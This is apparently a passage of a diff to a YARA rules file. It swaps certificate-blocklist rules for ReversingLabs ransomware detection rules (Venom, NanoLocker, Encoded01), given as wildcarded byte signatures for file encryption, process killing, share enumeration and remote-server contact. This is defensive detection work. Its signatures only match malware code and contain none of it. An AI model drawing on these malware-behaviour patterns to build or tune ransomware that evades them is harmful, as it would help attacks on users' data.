+            15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4
+            ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 8D 44 24 ?? 50 FF 15 ?? ?? ??
+            ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 55 55 68 ?? ?? ?? ?? 55 55 55 8D 84 24 ?? ?? ?? ??
+            50 55 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
+            ?? ?? 57 FF 15 ?? ?? ?? ?? 5B 5F 5E 5D 81 C4 ?? ?? ?? ?? C2
+        }
+		$encrypt_files_3 = {
+            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 33 C0 66 89 84 74 ?? ??
+            ?? ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 8D 44 24 ?? 50 E8 ?? ?? ??
+            ?? F6 44 24 ?? ?? 8B F0 74 ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50 E8 ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 44 24 ?? 50 FF
+            D7 85 C0 0F 84 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF
+            D7 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? A8 ?? 74 ?? 83 E0 ?? 50 8D 84 24 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? FF 74 24 ?? 6A ?? 56 E8 ?? ?? ?? ?? 50 FF 74 24 ?? 8D 84 24 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 8D 84 24
+            ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 74 24 ?? 59 8D 44 24 ?? 50 55 FF 15
+        }
+		$search_files_2 = {
+            53 55 56 57 8B 3D ?? ?? ?? ?? 6A ?? 6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 8B E8 FF 15 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 33 F6 8D 84 24 ?? ??
+            ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 DB 74 ?? F6 C3 ?? 74 ?? 8D 84 24 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? 6A ?? 6A ?? C6 84
+            24 ?? ?? ?? ?? ?? FF D7 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 44 B5 ?? 51 50
+            FF 15 ?? ?? ?? ?? 46 FE 84 24 ?? ?? ?? ?? D1 EB 75 ?? 33 FF 85 F6 7E ?? 8B 9C 24 ??
+            ?? ?? ?? 8D 44 24 ?? 2B E8 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8C
+            24 ?? ?? ?? ?? 89 48 ?? 8D 0C BD ?? ?? ?? ?? 03 CD 89 58 ?? 8B 4C 0C ?? 89 08 33 C9
+            51 51 50 68 ?? ?? ?? ?? 51 51 FF 15 ?? ?? ?? ?? 89 44 BC ?? 47 3B FE 7C ?? 6A ?? 6A
+            ?? 8D 44 24 ?? 50 56 FF 15
+        }
+		$kill_specific_processes_3 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 89 74 24 ?? 55 6A ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 83 FF
+            ?? 0F 84 ?? ?? ?? ?? 53 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 57
+            E8 ?? ?? ?? ?? 8B 5C 24 ?? 83 BC 24 ?? ?? ?? ?? ?? 8B F5 7E ?? 55 8D 84 24 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 8B E8 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 DB 89 44 24
+            ?? 85 C0 7E ?? 8B F8 0F BE 0C 2B 51 E8 ?? ?? ?? ?? 88 04 2B 43 3B DF 7C ?? 8B 84 24
+            ?? ?? ?? ?? FF 34 B0 55 FF 15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 46 50 5D 3B B4 24 ?? ??
+            ?? ?? 7C ?? 8B 7C 24 ?? 33 ED 85 DB 74 ?? 55 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 55 50 FF 15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 FF
+            15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 8D 44 24
+            ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 55 55 68 ?? ?? ?? ?? 55 55 55
+            8D 84 24 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 57 E8 ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x97\\xA5\\xE7\\x85\\xA7\\xE5\\xB3\\xB0\\xE5\\xB7\\x9D\\xE5\\x9B\\xBD\\xE9\\x99\\x85\\xE7\\x9F\\xBF\\xE4\\xB8\\x9A\\xE8\\xB4\\xB8\\xE6\\x98\\x93\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "53:05:91:c6:1b:5e:12:12:f6:59:13:8b:7c:ea:0a:97" and 1403654399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $search_files_1 and $encrypt_files_1 and $kill_specific_processes_1 ) or ( $search_files_1 and $encrypt_files_2 and $kill_specific_processes_2 ) or ( $search_files_2 and $encrypt_files_3 and $kill_specific_processes_3 ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_07270Ff9 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Venom : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Venom ransomware."
 		author = "ReversingLabs"
-		id = "fcd2d82a-b51d-53ff-bfae-3c83147c1903"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "72149ec2-888e-5bed-baf1-0ec44e48328e"
+		date = "2022-06-06"
+		modified = "2022-06-06"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L765-L781"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Venom.yara#L1-L68"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8f0da7c330464184fa1d5bf8d51dd8ad2e8637710a36972dcab03629cb57e910"
+		logic_hash = "5817ece6a1cc304835f7fc243c4cfdc3c7cacd2251a9ac294a6662b58d2552e8"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Venom"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Cyber CA" and pe.signatures [ i ] . serial == "07:27:0f:f9" and 1308182400 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_0727100D : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "1ee866ec-a445-5a79-b824-37f28a49f20b"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L783-L799"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a09f4004ed002b90d67a3baddde74832e6c7b70e8b330347ef169460750aa344"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$setup_env = {
+            00 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1B
+            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 07 6F ?? ??
+            ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 06 11 ?? 28 ?? ?? ?? ?? 00 00 12 ?? 28
+            ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 1F
+            ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 1F ??
+            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1F ?? 28 ?? ?? ?? ?? 72
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 72 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 0C 72 ?? ?? ?? ?? 20 ?? ?? ?? ?? 19 7E ?? ?? ?? ?? 19 16 7E ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 0D 09 08 20 ?? ?? ?? ?? 12 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 17 28
+            ?? ?? ?? ?? 00 2A
+        }
+		$find_files = {
+            00 00 00 03 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 00 00 08 72 ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 16 FE 01 0D 09 2C ?? 00 08 02 28 ?? ?? ?? ?? 00 00 00 DE ?? 26 00 00 DE ?? 00 07
+            17 58 0B 07 06 8E 69 32 ?? 00 03 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13
+            ?? 00 11 ?? 02 28 ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 DE ??
+            26 00 00 DE ?? 2A
+        }
+		$encrypt_files = {
+            00 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 0B 02 72 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 18 73 ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 00 09 18 6F ?? ?? ?? ?? 00 07 06 20 ?? ?? ?? ?? 73 ?? ?? ?? ??
+            13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F
+            ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 17 6F ?? ?? ?? ?? 00 08 06 16 06
+            8E 69 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ?? ?? ??
+            ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 00 2B ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ??
+            ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 25 13 ?? 16 FE 02 13 ?? 11 ?? 2D
+            ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00
+            DE ?? DE ?? 00 11 ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 00 02 28 ?? ?? ?? ?? 00 00
+            DE ?? 26 00 00 DE ?? 00 DC 2A
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Cyber CA" and pe.signatures [ i ] . serial == "07:27:10:0d" and 1308182400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $setup_env ) and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_07271003 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Nanolocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects NanoLocker ransomware."
 		author = "ReversingLabs"
-		id = "7573c436-5bf9-5522-9952-e30dbbccd092"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "a31dad2e-2738-527b-a6e9-322757e2ec30"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L801-L817"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.NanoLocker.yara#L1-L79"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "14c201b4fdda5b3553732a173a3d6705129c54f2a50d26997d63a77be8504285"
+		logic_hash = "7fdb021f22d97bf8a00fd856ef913695a0d6fbaad1138b5a5cc2cc8768b130be"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "NanoLocker"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Cyber CA" and pe.signatures [ i ] . serial == "07:27:10:03" and 1308182400 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_013134Bf : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "a3292707-c481-56a8-abf9-e1a762c76cb6"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L819-L835"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1ade100c310c22bce25bcc6687855bd4eb6364b64cf31514b2548509a16e4a36"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_file_1 = {
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 05 ?? ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6
+            05 ?? ?? ?? ?? ?? 8D 3D ?? ?? ?? ?? 33 C9 C6 07 ?? 47 41 81 F9 ?? ?? ?? ?? 75 ?? C7
+            05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 0F 84 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A
+            ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A
+            ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ??
+            ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 0F 84 ?? ?? ?? ?? 81 3D
+            ?? ?? ?? ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 56 E8
+            ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 56 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 F0 46 8A 06 3C ?? 0F 85 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
+        }
+		$encrypt_file_2 = {
+            A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 81 3D ?? ?? ?? ??
+            ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A ??
+            E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 2D ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? A3 ??
+            ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ??
+            ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ??
+            ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ??
+            ?? ?? ?? E8
+        }
+		$remote_server_1 = {
+            E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ??
+            ?? ?? 83 F8 ?? 72 ?? C6 05 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF
+            35 ?? ?? ?? ?? E8
+        }
+		$remote_server_2 = {
+            E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8
+        }
+		$enum_shares_and_encrypt_files = {
+            E8 ?? ?? ?? ?? C1 C8 ?? BA ?? ?? ?? ?? 23 D0 60 83 FA ?? 75 ?? 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 F8 ?? 76 ?? 83 F8 ?? 74 ?? 8D 35 ?? ?? ?? ?? 60 68 ?? ?? ?? ?? 56 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 61 8A 06 46 0A C0 75 ?? 8A 06 0A C0 75 ?? 61 D1 C8 8A 1D ??
+            ?? ?? ?? FE C3 88 1D ?? ?? ?? ?? 80 FB ?? 76 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar PKIoverheid CA Organisatie - G2" and pe.signatures [ i ] . serial == "01:31:34:bf" and 1308182400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $encrypt_file_1 and $encrypt_file_2 and $remote_server_1 and $remote_server_2 and $enum_shares_and_encrypt_files
 }
-
-rule REVERSINGLABS_Cert_Blocklist_01314476 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Encoded01 : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Encoded01 ransomware."
 		author = "ReversingLabs"
-		id = "e0a52ad1-cebd-5ffc-953f-e0b09fc6d710"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "923d987e-f888-5b6a-9ebd-ee1257124aed"
+		date = "2021-12-16"
+		modified = "2021-12-16"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L837-L853"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Encoded01.yara#L1-L141"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6f2f3f3ae009fbb9ebe589fc6b640be89c4a7b734eda515f182c7e9c9ffb4779"
+		logic_hash = "f6f872290f15f4c564911bb099824c47cb13164457e1bcdb02dee441bc2d6b6a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Encoded01"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar PKIoverheid CA Overheid" and pe.signatures [ i ] . serial == "01:31:44:76" and 1308182400 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_013169B0 : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "a5f68c0a-635a-5aa9-94d2-7628999f06c2"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L855-L871"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "354421ebad7fd0b73c9ba63630c91d481901ca9ec39be3c6b66843221e4b5aad"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_p1 = {
+            55 8B EC 51 B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 51 87 4D ?? 53 56 57 89 4D ?? 89 55
+            ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ??
+            64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 8B 15 ?? ?? ?? ?? 8B 12 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ??
+            8B 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 8B 55 ?? 66 83 7C 42 ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 4A 8D 45 ?? E8 ??
+            ?? ?? ?? 8B 7D ?? 4F 85 FF 0F 8C ?? ?? ?? ?? 47 8D 85 ?? ?? ?? ?? 50 FF 75 ?? 68 ??
+            ?? ?? ?? 8B 45 ?? 8B 55 ?? FF 34 90 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ??
+            33 F6 46 81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 8D
+            95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            0F 84 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ??
